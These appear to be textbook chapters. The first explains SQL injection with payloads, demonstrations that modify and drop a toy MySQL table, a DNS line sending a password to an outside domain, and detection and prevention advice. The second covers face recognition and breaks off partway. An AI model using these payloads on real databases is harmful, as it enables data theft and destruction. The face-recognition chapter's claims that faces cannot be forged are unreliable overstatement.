• This chapter provides knowledge of the SQL injection with the help of the flowchart or process flow of the SQL injection attack.


10.3 Process of SQL Injection Attack

In this section we show the flowchart of the SQL injection in Figure 10.3.1, which is given below, and discuss how an attacker can compromise the computer system, SQL server, and database using the SQL injection technique.

[Figure 10.3.1 Flowchart of SQL injection attack. Boxes shown: Print Headers; next_url; next_payload; launch_probe; R.status_code == 500; Launch manual attack.]


10.4 Related Work 


The author of [1] presented a detailed study on proposed methods and tools for detection and prevention of SQL injection attacks in the last decade and discussed the effectiveness of the detection and prevention mechanism.

The author of [2] presented the classical and modern types of SQL injection attack and displayed the different existing techniques and tools which can be used to detect and prevent an SQL injection attack as well as other cyberattacks.

The author of [3] proposed a technique called CombinedDetect, based on two methods named as JavaScript and PHP coding, to detect a malicious SQL query, separate the normal data from the malicious data, and prevent an SQL injection attack.

The author of [4] implemented the detection of the SQL injection attack using the NIST method in network forensics, in which SQL injection scenarios were created first and the log file was then created using a snort tool rule. The snort tool then mitigated the SQL injection attack by alerting the system using email. The result was analyzed with the help of user acceptance testing.

The author of [5] projected an approach to mitigate the SQL injection attack and maintain database security by using a hybrid encryption mechanism in the form of Advanced Encryption Mechanism (AES) and Elliptical Curve Cryptography (ECC), in which AES at the login phase prevents unauthorized access to the databases and ECC is used to encode the database so that no one can access the database without the key.

The author of [6] presented a web application system in which users can learn and practice SQL injection attacks. Basically this system is designed for students to become familiar with the SQL injection attack. The system contains 12 levels of SQL vulnerabilities which an attacker can exploit to compromise the database security.

The author of [7] presented an approach which detects the SQL injection attack in two steps. The first step creates a lexicon, and the second step tokenizes the input query statement. Each token was checked against the lexicon of predefined words to prevent the SQL injection attack.

The author of [8] proposed an SQL injection detection method using a deep learning framework on the basis of comprehensive domestic and international research. This method can improve accuracy and also reduce the false alarm rate.


10.5 Literature Review 


In the literature review we will discuss the different techniques or methods 
of the SQL injection attack and understand how we can compromise the 
system vulnerability using the SQL injection attack. 


Incorrectly filtered escape characters 


In this type of SQL injection, escape characters are not filtered out of the user input before it is passed into the SQL query, which allows the end user of the application to alter the query that runs on the database [2].

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

Figure 10.5.1 Code for filtered incorrectly escape characters [2].

The above code is used to extract the records of the specified username from its table of users. If an unauthorized user crafts the "userName" value in an incorrect way, then the attacker gets the data from the database. An example of the malicious attack is shown in the diagram below [2].

SELECT * FROM users WHERE name = '' OR '1'='1';

Figure 10.5.2 Malicious attack by replacing the "username" in incorrect way [2].

Most SQL server implementations allow multiple statements to be executed in one call, but this can help the attacker to modify the queries and data and make the database more vulnerable, which is shown in the diagram below [2].

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

Figure 10.5.3 Multiple SQL queries attack by attacker [2].


Blind SQL injection 


In this type of SQL injection, the website vulnerability is visible to the attacker 
but the attacker cannot view the result of the attack. This type of attack 
has traditionally been considered time-intensive because a new statement 
needed to be crafted for each bit recovered, and depending on its structure, 
the attack may consist of many unsuccessful requests. Recent advancements 
have allowed each request to recover multiple bits, with no unsuccessful 
requests, allowing for more consistent and efficient extraction [2]. 


Conditional responses 


This type of attack is an example of blind SQL injection in which the database is made to evaluate a logical SQL condition. For example, an attacker can load the URL https://books.example.com/review?id=5 OR 1=1 which can result in the query given below.

SELECT * FROM bookreviews WHERE ID = '5' OR '1'='1';

Figure 10.5.4 Conditional response [2].

If the above statement in the diagram shows the same result as the original SQL statement, then the website is vulnerable to the SQL injection attack, because the query passed through successfully as a legal SQL statement.

The attacker can also reveal the version of MySQL and other information by using the string

"https://books.example.com/review?id=5 AND substring(@@version, 1, INSTR(@@version, '.') - 1)=4"

which can be used by the attacker to fulfill its goal, access more information from the SQL server and find other vulnerabilities for another SQL injection attack [2].


Second order SQL injection 


In this type of attack, malicious SQL queries are hidden in the input values, which are stored as a valid SQL statement and are then executed as valid SQL queries. This type of attack needs more knowledge of the input values and how these values will be used for the attack. It is difficult for the investigator to detect this type of SQL injection statement. The investigator can use automated web tools to detect this type of attack and find the evidence [2].
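The store-then-execute pattern described above, as an added example that is not code from the chapter or its sources. It uses Python's built-in sqlite3 module with an in-memory database; the users table, its rows and all function names are constructed for illustration, and the stored value reuses the tautology from Figure 10.5.2.

```python
import sqlite3

# Constructed value: the tautology from Figure 10.5.2, submitted as a user name.
STORED_NAME = "x' OR '1'='1"


def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'alice-pw'), ('bob', 'bob-pw');
        """
    )
    return db


def register(db, name, password):
    """Step 1: store the input. The INSERT is parameterized, so nothing is
    injected here and the value is saved exactly as submitted."""
    cur = db.execute(
        "INSERT INTO users (name, password) VALUES (?, ?)", (name, password)
    )
    return cur.lastrowid


def stored_name(db, rowid):
    """Read the saved name back from the table."""
    return db.execute(
        "SELECT name FROM users WHERE rowid = ?", (rowid,)
    ).fetchone()[0]


def change_password_concat(db, rowid, new_password):
    """Step 2 (vulnerable): the stored name is treated as trusted because it
    came from the database, and is concatenated into a new statement."""
    sql = (
        "UPDATE users SET password = '" + new_password + "' "
        "WHERE name = '" + stored_name(db, rowid) + "'"
    )
    return db.execute(sql).rowcount  # number of rows the UPDATE changed


def change_password_param(db, rowid, new_password):
    """Step 2 (hardened): stored data is bound as a parameter like any other
    input, so it is only ever compared as a string."""
    cur = db.execute(
        "UPDATE users SET password = ? WHERE name = ?",
        (new_password, stored_name(db, rowid)),
    )
    return cur.rowcount


def demo(change_password):
    """Register the constructed name, change its password, report the effect."""
    db = make_db()
    rowid = register(db, STORED_NAME, "pw")
    changed = change_password(db, rowid, "new-pw")
    passwords = dict(db.execute("SELECT name, password FROM users"))
    return changed, passwords


if __name__ == "__main__":
    for fn in (change_password_concat, change_password_param):
        changed, passwords = demo(fn)
        print(fn.__name__, "rows changed:", changed, passwords)
```

The insert is safe in both runs; only the later statement that reuses the stored value decides whether one row or every row is changed.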


SQL Injection and Domain Name Service Hijacking 


In this type of attack, the attacker can embed the SQL query in a DNS request, which makes its way onto the internet, and capture it [2].

ido_dns_lookup( (select top 1 password from userTable) + '.inse6140.net' );

Figure 10.5.5 SQL injection and DNS attack [2].


10.6 Implementation of the SQL Injection Attack


10.6.1 Access the Database Using the 1=1 SQL Injection 
Statement 


Step 1) Create the database, create the table student inside the database, and insert the values into the table student as the authorized user.

mysql> create table student(userid int, password int, firstname varchar(255), lastname varchar(255));
Query OK, 0 rows affected (0.89 sec)

mysql> insert into student values('1', '123', 'abc', 'xyz');
Query OK, 1 row affected (0.26 sec)

mysql> insert into student values('2', '456', 'def', 'def');
Query OK, 1 row affected (0.17 sec)

mysql> insert into student values('3', '789', 'jkl', 'efg');
Query OK, 1 row affected (0.17 sec)

Figure 10.6.1.1 Student table creation and insert the values [4].

Step 2) Access the table as the authorized user by using the SQL statement given below:

"select * from student;"

mysql> select * from student;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      1 |      123 | abc       | xyz      |
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
3 rows in set (0.00 sec)

Figure 10.6.1.2 Access the table [4].

Step 3) Access the table content as the unauthorized user by using the 1=1 sql statement, which is given as: "select * from student where userid = '2' or 1=1;" and gives unauthorized access to the attacker.

mysql> select * from student where userid = '2' or 1=1;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      1 |      123 | abc       | xyz      |
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
3 rows in set (0.00 sec)

Figure 10.6.1.3 Unauthorized table access using 1=1 sql statement [4].


10.6.2 Access the Database Using the ""="" SQL Injection Statement


Step 1) Create the database, create the table student inside the database, and insert the values into the table student as the authorized user.

mysql> create table student(userid int, password int, firstname varchar(255), lastname varchar(255));
Query OK, 0 rows affected (0.89 sec)

mysql> insert into student values('1', '123', 'abc', 'xyz');
Query OK, 1 row affected (0.26 sec)

mysql> insert into student values('2', '456', 'def', 'def');
Query OK, 1 row affected (0.17 sec)

mysql> insert into student values('3', '789', 'jkl', 'efg');
Query OK, 1 row affected (0.17 sec)

Figure 10.6.2.1 Student table creation and insert the values [4].

Step 2) Access the table as the authorized user by using the SQL statement given below:

"select * from student;"

mysql> select * from student;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      1 |      123 | abc       | xyz      |
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
3 rows in set (0.00 sec)

Figure 10.6.2.2 Access the table [4].

Step 3) Access the table content as the unauthorized user by using the ""="" sql statement, which is given as: "select * from student where firstname = "" or ""="" and password = "" or ""="";" and gives unauthorized access to the attacker.

mysql> select * from student where firstname = "" or ""="" and password = "" or ""="";
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      1 |      123 | abc       | xyz      |
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
3 rows in set (0.00 sec)

Figure 10.6.2.3 Unauthorized table access using ""="" sql statement [4].


10.6.3 Access and Upgrade the Database by Using Batch SQL Injection Statement


Step 1) Create the database, create the table student inside the database, and insert the values into the table student as the authorized user.

mysql> create table student(userid int, password int, firstname varchar(255), lastname varchar(255));
Query OK, 0 rows affected (0.89 sec)

mysql> insert into student values('1', '123', 'abc', 'xyz');
Query OK, 1 row affected (0.26 sec)

mysql> insert into student values('2', '456', 'def', 'def');
Query OK, 1 row affected (0.17 sec)

mysql> insert into student values('3', '789', 'jkl', 'efg');
Query OK, 1 row affected (0.17 sec)

Figure 10.6.3.1 Student table creation and insert the value [4].

Step 2) Access the table as the authorized user by using the SQL statement given below:

"select * from student;"

mysql> select * from student;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      1 |      123 | abc       | xyz      |
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
3 rows in set (0.00 sec)

Figure 10.6.3.2 Access the table [4].

Step 3) Update the table content as the unauthorized user by using the batched sql statement, which is given as "select * from student where userid='3'; update student set firstname = 'rst' where userid='1';". This updates the content of the student table, and when we view the data using "select * from student;" the content is updated.

mysql> select * from student where userid = '3'; update student set firstname = 'rst' where userid = '1';
Rows matched: 1  Changed: 1  Warnings: 0

mysql> select * from student;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      1 |      123 | rst       | xyz      |
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
3 rows in set (0.00 sec)

Figure 10.6.3.3 Modify table content using batched sql statement [4].

Step 4) Delete the table content as the unauthorized user by using the batched sql statement, which is given as "select * from student where userid='3'; delete from student where userid='1';". This deletes the content of the student table, and when we view the data using "select * from student;" the content is deleted.

mysql> select * from student where userid='3'; delete from student where userid='1';

mysql> select * from student;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      2 |      456 | def       | def      |
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
2 rows in set (0.00 sec)

Figure 10.6.3.4 Delete table content using batched sql statement [4].

Step 5) Drop the table as the unauthorized user by using the batched sql statement, which is given as "select * from student where userid='3'; drop table student;". This deletes the content of the student table, and when we view the data using "select * from student;" the table is dropped.

mysql> select * from student where userid='3'; drop table student;
+--------+----------+-----------+----------+
| userid | password | firstname | lastname |
+--------+----------+-----------+----------+
|      3 |      789 | jkl       | efg      |
+--------+----------+-----------+----------+
1 row in set (0.00 sec)
Query OK, 0 rows affected (0.76 sec)

mysql> select * from student;
ERROR 1146 (42S02): Table 'student.student' doesn't exist

Figure 10.6.3.5 Drop table using batched sql statement [4].


10.7 Detection of SQL Injection Attack 
Detection mechanism for the SQL injection attack is as follows: 


• Use the single quote character (') and check for errors and anomalies.

• Use SQL-specific syntax that evaluates to the value at the starting point and to a different value, and then check for the difference in the responses.

• Use Boolean conditions such as OR 1=1 and OR 1=2 and then check the difference in their results.

• Use a large amount of data embedded in an SQL query to cause time delays, and check for a contrast in the time taken to respond [1, 4].
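The single-quote and Boolean checks from the list above, written as a regression test for your own data-access functions (an added example, not code from the chapter). It uses Python's built-in sqlite3 module and the student table from Section 10.6; lookup_concat, lookup_param and probe are hypothetical names, and the time-delay check is left out.

```python
import sqlite3


def make_db():
    """In-memory copy of the student table from Section 10.6."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE student (userid INT, password INT,
                              firstname VARCHAR(255), lastname VARCHAR(255));
        INSERT INTO student VALUES (1, 123, 'abc', 'xyz');
        INSERT INTO student VALUES (2, 456, 'def', 'def');
        INSERT INTO student VALUES (3, 789, 'jkl', 'efg');
        """
    )
    return db


def lookup_concat(db, userid):
    """Function under test: builds the query by string concatenation."""
    return db.execute(
        "SELECT * FROM student WHERE userid = " + userid
    ).fetchall()


def lookup_param(db, userid):
    """Function under test: binds the value as a parameter."""
    return db.execute(
        "SELECT * FROM student WHERE userid = ?", (userid,)
    ).fetchall()


def probe(lookup, db, base="2"):
    """Return the checks that show the input reaches the SQL parser."""
    findings = []

    # Check 1: a single quote. If the value is parsed as SQL, the unbalanced
    # quote breaks the statement and the driver raises an error.
    try:
        lookup(db, base + "'")
    except sqlite3.Error:
        findings.append("quote-error")

    # Check 2: a Boolean pair. OR 1=1 and OR 1=2 only give different results
    # when the database evaluates them as conditions.
    try:
        always_true = lookup(db, base + " OR 1=1")
        always_false = lookup(db, base + " OR 1=2")
    except sqlite3.Error:
        findings.append("boolean-error")
    else:
        if always_true != always_false:
            findings.append("boolean-difference")

    return findings


if __name__ == "__main__":
    for fn in (lookup_concat, lookup_param):
        print(fn.__name__, probe(fn, make_db()))
```

An empty list means neither check could change how the statement was parsed; any entry marks the function as one to rewrite with bound parameters.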


10.8 Prevention/Mitigation from SQL Injection Attack 


• Don't use dynamic SQL: Use prepared statements, parameterized queries or stored procedures whenever needed, and do not reach for a dynamic SQL statement every time.

• Update and patch: Apply the patches and updates in a timely manner when available to prevent the exploitation of the vulnerabilities in the web applications and in the database.

• Use appropriate privileges: We should give limited access to those who are working on the web application, which can limit the attack or illegal activity in the web application to a certain extent.

• Enforcement at the coding level: We can use object-relational mapping libraries to avoid the use of SQL code.

• Escaping: A simple method to prevent SQL injection is to avoid the use of characters that have a special meaning in SQL queries, such as ('), ("), \x00, \n, etc.

• Trust no one: We must not trust each and every piece of data and its values. We have to filter the user data by context [1, 2].
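The "Don't use dynamic SQL" item applied to the statements of Figures 10.5.1 to 10.5.3, as an added example (not code from the chapter). It uses Python's built-in sqlite3 module; the table rows and function names are constructed, and executescript stands in for a database API that accepts several statements in one call.

```python
import sqlite3

# Inputs that turn Figure 10.5.1 into Figure 10.5.2 and Figure 10.5.3.
TAUTOLOGY = "' OR '1'='1"
BATCHED = "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't"


def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (name TEXT, email TEXT);
        CREATE TABLE userinfo (name TEXT, note TEXT);
        INSERT INTO users VALUES ('a', 'a@example.test'), ('b', 'b@example.test');
        INSERT INTO userinfo VALUES ('a', 'constructed row');
        """
    )
    return db


def build_statement(user_name):
    """Dynamic SQL exactly as in Figure 10.5.1."""
    return "SELECT * FROM users WHERE name = '" + user_name + "';"


def find_user_dynamic(db, user_name):
    """Vulnerable lookup: the input becomes part of the SQL text."""
    return db.execute(build_statement(user_name)).fetchall()


def run_dynamic_batch(db, user_name):
    """Vulnerable lookup through an API that runs every statement it is given."""
    db.executescript(build_statement(user_name))


def single_statement_api_rejects(db, user_name):
    """sqlite3's execute() refuses text that holds more than one statement.
    The exception class differs between Python versions, so catch both."""
    try:
        db.execute(build_statement(user_name))
    except (sqlite3.Warning, sqlite3.Error):
        return True
    return False


def find_user_prepared(db, user_name):
    """Hardened lookup: the statement is fixed and the input is bound as data."""
    return db.execute(
        "SELECT * FROM users WHERE name = ?", (user_name,)
    ).fetchall()


def table_exists(db, table):
    row = db.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (table,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    print("dynamic, tautology :", find_user_dynamic(make_db(), TAUTOLOGY))
    print("prepared, tautology:", find_user_prepared(make_db(), TAUTOLOGY))
    db = make_db()
    run_dynamic_batch(db, BATCHED)
    print("users table after dynamic batch :", table_exists(db, "users"))
    db = make_db()
    find_user_prepared(db, BATCHED)
    print("users table after prepared query:", table_exists(db, "users"))
```

Relying on a driver that rejects batched statements only blocks the Figure 10.5.3 case; the tautology still succeeds through the dynamic lookup, which is why the bound parameter is the fix.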


10.9 Conclusion 


In this chapter we have studied and discussed the SQL injection and types 
of SQL injection, as well as the methodology of how an attacker executes 
an SQL injection attack and its practical implementation. We have also 
offered some detection and prevention steps about how we can provide 
database security from SQL injection. In future, many methodologies will 
be needed to determine how an attacker implements an SQL injection 
attack and how we can detect and prevent such an attack. Also in future we 
will be concerned about the weakness in SQL server database, and also deal 
with poor database functionality and irregularity in updating the patches 
in the database security. For these concerns more techniques and meth- 
odologies will emerge and be implemented to understand how an attacker 
can implement an SQL injection attack; more prevention and detection 
mechanisms will also emerge in the near future.

Abstract

The modern world is rapidly revolutionizing the way things work. Everyday 
actions are being handled electronically. Based on this, a sub-division of applica- 
tion in recognition, specifically face recognition, emerged. Face recognition is a 
technology capable of verifying the identity of an individual using their face from 
a digital frame against a database. It has been one of the most captivating and 
prime research fields in the past few decades. The motivation came from the need 
of automated recognition and verification. Compared with traditional biometric 
systems, i.e., fingerprint recognition and iris recognition, face recognition has 
numerous advantages, not just limited to “no-contact” and “user friendly”. Face 
recognition is currently being used to make the world smarter and safer. It has 
future scope to be used in finding missing people, e-commerce, education and 
many fields. Artificial Intelligence is one of the upcoming and important areas in 
the field of research and development. It solves various image-related tasks using 
different algorithms. A number of papers have been published on this subject giv- 
ing an idea of how accurately and efficiently these techniques identify people. This 
chapter explores general machine learning algorithms and neural network archi- 
tectures to identify the identity of an individual, comparing them to see which 
algorithm works best under certain conditions.

11.1 Introduction


In today’s busy world, maintenance of both the security of physical prop- 
erty as well as information is becoming increasingly difficult as well as 
important. To tackle this concern, researchers came up with a solution 
of a face recognition system. Face recognition is an important solution to 
many practical problems (e.g., credit card fraud, IOT attacks by intrud- 
ers, or security breaches in a company or government building, etc.). In 
most of these situations criminals used to take advantage by easily making 
fake or duplicate identities through which they were able to commit crimes 
using someone else’s identity and escape detection, but with the FRS (face 
recognition system) these problems can be minimized to an extent. Also, 
now most of these criminals get caught and are punished under the law. 

FRS has rapidly developed in the past few decades, hence now it is used 
in every sector - from healthcare to agriculture, from industries to law 
enforcement and many more. And with the advancement in technologies, 
particularly in the field of Artificial Intelligence and Machine Learning, 
FRS will get more advanced and secure in the future. 

Face recognition is an algorithm which can identify or confirm the identity of a person, thing or any other material by analysing their images. It is widely used for security purposes, law enforcement, etc. There are many factors which make a good recognition system, such as a large database of facial images and a system that can analyze the accuracy and efficiency of the FRS. There are many other factors but the two mentioned above are the most important.

In this chapter it is shown how machine learning and deep learning 
techniques can be employed to develop a face recognition system, and a 
comparison is done among different techniques used. The main algorithm 
used is the Convolutional Neural Network (CNN) which is a deep learn- 
ing algorithm that takes input as image and does mapping on the import- 
ant features by assigning different weights/biases to various aspects of the 
image and hence is able to recognize images. 

The following machine learning and deep learning techniques are used 
in the experiment: 


• K-Nearest Neighbors
• Support Vector Machine
• Logistic regression
• Naive Bayes
• Decision tree
• Convolutional Neural Network (CNN)

Since many machine learning and deep learning algorithms are used, a basic introduction regarding each is presented in the following section.


11.2 Face Recognition System (FRS) in Security 


Facial recognition systems upgraded biometric security to the next level. 
They are considered more secure than other security techniques due to 
their high acceptability and uniqueness, and they involve shorter process- 
ing time. Using a face recognition system as a security measure in leading 
institutions and workplaces ensures that there is absolutely no room for 
vandalism or human error. 

There are many applications of face recognition systems in security. A 
few of these applications are described below. 


• Criminal Identification - Most individuals conceal their identity (cover their faces with mask, scarves, etc.) while committing a criminal offence. Face recognition proved to be a tremendous advantage to law enforcement by helping them to recognize a person merely by scanning a masked face. It can also be used to identify unconscious or dead people at crime scenes.

• Bank Services - Most bank services use passwords exclusively as a security measure, but a major drawback of using only passwords is that they're based on an individual's knowledge. Moreover, the more complicated passwords become, the easier people tend to forget them. Even security questions aren't entirely reliable. A professional could use social engineering to learn sensitive information, ultimately compromising the security of bank accounts. Since a face is undoubtedly connected to its owner, face recognition can be offered as a second factor in authentication along with passwords to present more barriers to defrauders.

• Healthcare - Every year the healthcare sector generates large amounts of sensitive data which is an easy target for cyber thieves. In order to safeguard sensitive data, hospitals are examining the use of face recognition techniques. It is also being used to identify patients and access patient registration and records. It helps to stop patient impersonation (when someone tries to get expensive medical treatment for free). In the midst of the global COVID-19 pandemic this technology has helped in tracking down people who are in quarantine without coming in direct contact with them.

• Tracking Attendance - Using a key-card for security access is simple and pretty generic. However, anyone with access to a code/key-card can misuse it, whereas face identification cannot be forged, i.e., only legitimate individuals can gain access. It has other unquestionable advantages such as it can reduce administrative cost, improve employee productivity, and get real-time data of number of hours employees worked, etc.


11.3 Theory 


11.3.1 Neural Networks 


A neural network is a system/collection of neurons which is used to rec- 
ognize patterns in a dataset through a process that mimics the functioning 
and nature of the human brain’s neural network. For instance, when some- 
one hears something, this is called data and is processed by data process- 
ing cells known as neurons in the brain, which recognize what sound it 
is; a neural network works in a similar manner. These networks are used 
because of their phenomenal ability to extract meaningful information 
from complex or imperfect data, which can be used to detect complex pat- 
terns that are too complicated to be detected by any other computer tech- 
niques or humans. They easily adapt to the changing input data as well so 
that they can give the best solution to the problem in front of the machine 
and generate new output easily, according to the updated criteria. 

The fundamental unit of computation in the neural network is a neuron, 
also known as a perceptron. It gets its input from an external source or 
some other perceptrons and calculates an output value to be passed or the 
final result. A neural network consists of several perceptrons in many lay- 
ers. A neural network can have one or more layers and each layer can have 
one or more neurons. The most basic type of neural network comprises 
three layers: input unit layer connected to a layer of hidden units, which is 
further connected to an output unit layer. 


• Input Unit - First layer. Raw data is fed into this layer of network from which the neural network has to learn.

• Hidden Unit - Layer between input and output layer. This has a function programmed in it which applies relevant values to input and passes it to the output layer.

• Output Unit - Last Layer. This has the output value or label which the neural network is trying to predict.


There are numerous interconnections between layers. These inter- 
connections extend from each perceptron in the first layer to every 
single perceptron in the second layer, which are called weights between 
layers. These weights are assigned on the basis of their correlative 
importance to other inputs. On arranging vectors of weights corre- 
sponding to each input perceptron horizontally, a matrix is formed 
known as a weight matrix [1]. There's also a trainable bias value pres- 
ent at each perceptron which is not dependent on input value just to 
add a bit of adjustability. Now if the weight matrix is multiplied with 
the input vector and a bias vector is added, intermediate perceptron 
values are obtained. 

In spite of the fact that the neural network is a very complicated configuration, it will be ineffective in solving problems that involve non-linearity. Regardless of what weights are used, at the end of the day the change in input values will only result in linear change in the output vector [4]. But in the real world this is undesirable, as data has non-linear relationships between input and output variables. This problem is solved by introducing an activation function at the end of each perceptron. It can also be used to decide whether input provided by the perceptron is relevant or not. Some popularly used activation functions are:


• ReLU - Stands for rectified linear units. It takes all real-valued inputs and replaces negative values with zero. F(x) = max(0,x)

• Sigmoid - It takes real value input and squishes it to a range between 0 and 1. This function will pass 0 for very small negative values and 1 for large positive values; it is generally used at the last layer.

• Softmax - It takes a vector of real value scores and converts it into values between 0 and 1 whose sum is 1.

• Tanh - It takes real value input and converts it to the range [-1,1].

Neural Network learns by following three steps:

• Forward Propagation - Before the first iteration all weights in the network are randomly assigned; only then does it move from input to output layer.

• Error Estimation - At the end of iteration at the output layer, error is calculated by checking the deviation/variation from original output.

• Backward Propagation - After error estimation it passes on these values back through the network to calculate gradients. Then all weights are adjusted/updated with the goal of reducing error at the output layer. This method is also known as Gradient Descent.
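A small worked example of the point made above about activation functions, added here and not taken from the chapter: two layers with no activation collapse into a single weight matrix and bias, while the same weights with ReLU compute a non-linear function. It is plain Python; the weights are constructed so that the results are exact.

```python
import math


def matvec(W, x):
    """Weight matrix times input vector."""
    return [sum(w * v for w, v in zip(row, x)) for row in W]


def layer(W, b, x, activation=None):
    """One layer: W.x + b, followed by an optional activation function."""
    z = [s + bias for s, bias in zip(matvec(W, x), b)]
    return activation(z) if activation else z


def relu(z):
    return [max(0.0, v) for v in z]


def sigmoid(z):
    return [1.0 / (1.0 + math.exp(-v)) for v in z]


def softmax(z):
    m = max(z)  # subtract the maximum for numerical stability
    e = [math.exp(v - m) for v in z]
    total = sum(e)
    return [v / total for v in e]


def tanh(z):
    return [math.tanh(v) for v in z]


def collapse(W1, b1, W2, b2):
    """Fold two activation-free layers into one: W = W2.W1, b = W2.b1 + b2."""
    cols = list(zip(*W1))
    W = [[sum(a * c for a, c in zip(row, col)) for col in cols] for row in W2]
    b = [s + bias for s, bias in zip(matvec(W2, b1), b2)]
    return W, b


# Constructed weights: 2 inputs -> 2 hidden units -> 1 output.
W1, b1 = [[1.0, -1.0], [-1.0, 1.0]], [0.0, 0.0]
W2, b2 = [[1.0, 1.0]], [0.0]


def linear_net(x):
    """Both layers without activation: equivalent to one linear layer."""
    return layer(W2, b2, layer(W1, b1, x))


def relu_net(x):
    """Same weights with ReLU on the hidden layer: computes |x1 - x2|."""
    return layer(W2, b2, layer(W1, b1, x, relu))


if __name__ == "__main__":
    print("collapsed layer:", collapse(W1, b1, W2, b2))
    for x in ([2.0, 1.0], [1.0, 3.0]):
        print(x, "linear:", linear_net(x), "with ReLU:", relu_net(x))
    print("softmax:", softmax([1.0, 2.0, 3.0]))
```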


11.3.2 Convolutional Neural Network (CNN) 


Since the mid-twentieth century, the early days of research in artificial intelligence, researchers and computer scientists have been trying to search for a way to get sense out of the visual data present in this world. Extracting, analyzing and learning patterns out of the visual data manually is very tedious work and also time consuming. However, things have changed rapidly decade by decade: researchers have made so much advancement in this field of work that the above tasks have become less onerous, and large stacks of data have become easily maintainable [5]. One of many such areas is computer vision. The main objective of the field of computer vision is to see the world as humans do.

It is a known fact that neural networks are good at complex computations
and may seem to be perfect for such aims. But now consider an object
detection task; this can also be achieved, but a problem arises when the
image is of high resolution, i.e., made of a large number of pixels; then
the number of parameters increases, making the neural network slow and
computationally expensive. For instance, if one processes a 32*32*3
image, then they'll get 3072 parameters, but if they get a high-resolution
image of 1080*1080*3, then it has approximately 3 million parameters to
process, and that too for a single iteration. For tasks like object
detection, image recognition, etc., one won't use traditional neural
networks but a specific type known as a convolutional neural network.

Convolutional Neural Network (CNN) is a deep learning algorithm which
takes an image as input and maps its important features by assigning
different weights/biases to various aspects of the image, and hence is
able to distinguish different images. Convolutional neural networks
process input images as tensors (matrices with additional dimensions) [7].
The image which humans see is different from what the computer sees. For
example, a color image of size 720x720 is represented as 720x720x3
(Channels = 3 (RGB)). Each pixel has a value from 0 to 255 which
represents pixel intensity at that point. A Convolutional Neural Network
comprises two main components:


• Feature Learning
• Classification


Feature Learning comprises a convolution layer and a pooling layer. It
carries out the main part of the network’s computational load. In the
convolution layer, a restricted part of the input image performs a dot
product with a filter/kernel (matrix of learnable parameters). The
features extracted depend on the type of kernel used. Hence it is very
important to choose the correct kernel depending upon the feature
required [6]. These are a few types of common filters used in CNN:


• Sharpen
• Edge Detection
• Blur
• Masking


If the image is grayscale then the filter will have small width and height
but will have the same depth (h x w x 1) as that of the image. The
resultant feature map will depend on three parameters:


• Stride - the number of pixels by which the filter matrix is moved over
the input matrix. A larger stride results in smaller feature maps. Given
that neighboring pixels are closely related, it makes sense to use stride
and reduce output size. A smaller stride is recommended over a big one,
as a big stride can lead to high information loss: it tends to take
pixels which are further away from each other and less correlated.

• Padding - how many extra pixels should be added to an image to
maintain its dimensionality. 1 is mostly used for padding.

• Depth - the number of channels in the image.

So, the convolution layer results in a feature map with fewer parameters
and the same dimensionality.

The pooling layer serves solely to decrease the computational power
required and to prevent overfitting, by reducing the dimensionality of
feature maps while keeping crucial information. This layer extracts key
features from a limited neighborhood. Pooling doesn't require any
parameter. This layer only modifies the height and width of the feature
map; depth remains unchanged, as pooling works individually on each depth
slice. In common CNN architectures, pooling is performed with stride 2,
2x2 windows and no padding, whereas convolution is done with padding, 3x3
windows and stride 1. Some popularly used pooling methods are:


• Max - The maximum value is taken amongst all values lying in the
pooling region.

• Average - The average value of all values lying in the pooling region
is taken.

• Min - The minimum value is taken amongst all values lying in the
pooling region.

• Sum - The sum of all values in the pooling region is taken.


At the end a matrix is created which has fewer dimensions and only the
chief features of the image.

After obtaining features, the input image is transformed into a suitable
form for a multi-level fully connected architecture; fully connected
layers are used for classifying. A fully connected layer is a simple,
feed-forward neural network. The output is flattened and fed to a fully
connected layer, then back-propagation is applied through iterations of
training. Over a sequence of epochs, models can differentiate certain
low-level attributes in images. Ultimately, an activation function like
sigmoid or softmax is applied, classifying the output. Image recognition
and classification are the chief fields of its application. Some other
applications are facial recognition and verification, and document
digitization. Traditional CNN is not the go-to model for every
image-related task. Some network architectures based on CNN are:


• LeNet-5
• AlexNet
• VGG 16
• Inception
• ResNet
• DenseNet


11.3.3 K-Nearest Neighbors (KNN)


KNN is an algorithm inspired by real life. It is one of the simplest,
most easily implemented supervised machine learning algorithms (ones that
learn from labelled data), and is used to find solutions to regression
and classification problems [3]. As one’s surroundings shape their
personality, likewise this algorithm presumes that similar things exist
in close proximity due to their similar features/properties. The value of
a data point is dependent upon the data points around it. It finds the
distance between the given query and those data points. There are various
methods to measure distance:


• Euclidean distance (default, most commonly used)
• Manhattan distance
• Minkowski distance
• Cosine distance
